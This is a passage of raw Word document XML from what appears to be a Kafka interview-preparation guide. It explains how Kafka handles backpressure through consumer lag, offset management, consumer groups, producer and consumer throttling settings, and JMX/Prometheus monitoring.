          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The most common form of backpressure on the consumer side is </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer lag</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, where a consumer is falling behind in consuming messages from the broker. Kafka keeps track of the consumer’s offset (position in the topic), and if consumers are slow, it’s reflected as lag (the difference between the latest message offset and the consumer’s offset). Consumer lag allows the system to monitor backpressure in real-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A605634" w14:textId="77777777" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145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anual Offset Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka allows consumers to manage their offsets manually, meaning they can choose to skip over messages, commit offsets later, or adjust how many messages they consume at a time. This gives consumers more control over handling backpressure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD7B300" w14:textId="77777777" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145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Group Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka enables the use of </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer groups</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to distribute the load of message consumption across multiple consumers. If one consumer in the group is slow or under heavy load, other consumers in the group can take over and balance the load, reducing the impact of backpressure on individual consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FAE3FC" w14:textId="77777777" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145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Polling and Fetching Configurations</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka consumers use the poll() method to fetch messages. The max.poll.records and max.poll.interval.ms settings control how many records are fetched in one poll and how long consumers wait before fetching new records. By controlling these configurations, consumers can throttle the rate at which they consume messages, preventing overload and mitigating backpressure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59092458" w14:textId="77777777" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145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Throttling</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: If consumers cannot keep up with the rate at which messages are being produced, they can be throttled either through </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rate limiting</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the consumer application level or by adjusting consumer configurations to fetch fewer records at a time. Kafka also provides mechanisms to control the maximum fetch size (fetch.max.bytes) to control the amount of data retrieved at once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC43017" w14:textId="77777777" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33" w:rsidP="00542F33">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4. Consumer and Producer Throttling Mechanisms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5775C050" w14:textId="77777777" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33" w:rsidP="00542F33">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also allows you to throttle the rate at which messages are consumed or produced using various configurations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5FB4B9" w14:textId="77777777" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145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roducer Throttling</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: By controlling settings such as acks (acknowledgment level), batch.size, and linger.ms, the producer can be configured to wait or retry sending messages when Kafka brokers are under heavy load or facing backpressure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A4FA1F" w14:textId="77777777" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145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Throttling</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The consumer can be configured to consume fewer messages at a time by setting max.poll.records and fetch.min.bytes. Additionally, consumers can be programmed to pause and resume consumption based on resource availability or other conditions in the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311C33BB" w14:textId="77777777" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33" w:rsidP="00542F33">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5. Use of Kafka’s Internal Metrics and Monitoring Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F956D1" w14:textId="77777777" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33" w:rsidP="00542F33">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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Kafka exposes a wide range of metrics through </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JMX</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Java Management Extensions), which can be used to monitor the health and performance of Kafka brokers, producers, and consumers. Monitoring metrics like producer throughput, consumer lag, partition leader election times, and broker disk utilization can help detect backpressure conditions early and allow administrators to intervene before they affect system performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758452A6" w14:textId="77777777" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33" w:rsidP="00542F33">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Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70638DC5" w14:textId="77777777" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33" w:rsidP="00542F33">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s architecture is built to handle backpressure in a distributed environment through mechanisms like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3642B089" w14:textId="77777777" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146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roducer-side buffering, retries, and async operations</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377B35E3" w14:textId="77777777" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146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roker-side disk management, replication, and log compaction</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCF0F33" w14:textId="77777777" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146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side management of offsets, lag monitoring, and consumer group balancing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E86C0CF" w14:textId="77777777" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146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Throttling mechanisms</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for producers and consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129FC8A0" w14:textId="77777777" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146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afka metrics and monitoring tools</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for detecting and managing backpressure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E06CAE" w14:textId="77777777" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33" w:rsidP="00542F33">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ese features ensure that Kafka can maintain its high throughput, low-latency message delivery even when producers or consumers face slowdowns, making Kafka a robust system for managing backpressure in real-time streaming data environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0906A0" w14:textId="370783CE"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B01A01B">
          <v:rect id="_x0000_i3182" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4FF14C" w14:textId="2D6FDECC" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00246E17" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="799" w:name="_Toc196308279"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Discuss how Kafka handles backpressure and the role of consumer lag and producer rate limits in managing this</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="799"/>
    </w:p>
    <w:p w14:paraId="2F9EBC9A" w14:textId="7BD102C8" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00974D36">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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handles backpressure through several mechanisms, focusing primarily on how producers send data to brokers, how brokers handle incoming data, and how consumers consume data from Kafka topics. Key concepts such as </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer lag</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producer rate limits</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and other internal controls play an essential role in managing backpressure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B62A59" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00944DF8">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1. Producer Rate Limiting and Buffering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22838056" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00944DF8">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ackpressure on Producers</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Producers in Kafka are responsible for sending messages to Kafka brokers. Backpressure on the producer side typically occurs when the producer is unable to send messages to Kafka at the rate it is producing them, either due to broker overload or network issues. Kafka provides several ways to manage this backpressure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DF1B37" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146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uffering</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka producers maintain an internal buffer to accumulate messages before sending them to brokers. The buffer is designed to optimize performance and reduce the frequency of network calls. However, if the buffer is full due to slow broker response, the producer will be throttled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F23DAC1" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146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ate Limiting</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the Kafka broker cannot accept messages fast enough (due to disk I/O, network congestion, or broker overload), producers will experience backpressure. Kafka producers can be configured to either:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8C0CC8" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="146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lock until the buffer has space</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (acks and linger.ms settings control this behavior).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D33970" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="146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Retry</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sending the message after a configurable delay (retries, retry.backoff.ms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124F3CEE" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="146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Throttle</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by reducing the rate at which messages are produced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E135A1" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146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roducer Configuration for Flow Control</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED319AF" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="146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acks</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The acknowledgment level (acks=1, acks=all) controls the durability of message delivery. A producer can wait for either a response from the leader partition (acks=1) or from all replicas (acks=all). If acknowledgment takes too long, backpressure can occur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138D3142" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="146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atch.size</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linger.ms</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: These settings control the batch size and how long messages are buffered before sending. Larger batch sizes and longer linger.ms times can reduce network calls but increase memory usage, potentially leading to more significant backpressure if not managed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA76CEC" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00944DF8">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2. Consumer Lag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740A5932" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00944DF8">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Lag and Backpressure</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Consumer lag is a key indicator of backpressure on the consumer side. It happens when consumers are not able to keep up with the rate at which messages are being produced and stored in Kafka. Consumer lag is calculated as the difference between the latest available offset in a topic partition and the consumer’s current offset. High consumer lag indicates backpressure, as the consumer is falling behind.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0CCD99" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146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onitoring Lag</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka exposes metrics for </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer lag</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> through JMX (Java Management Extensions) and other monitoring tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Monitoring lag helps identify when consumers are struggling to consume data at the rate it is being produced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223838EE" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146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mpact of Consumer Lag</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ECCDD6" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="146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f consumer lag grows too large, consumers may miss important events or overwhelm system resources, leading to delays.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A1809A" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="146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For real-time processing applications, high lag can indicate that the system is under heavy load or not scaling properly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CF896F" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146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lastRenderedPageBreak/>
        <w:t>Handling Consumer Lag</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED839F7" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="146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caling Consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
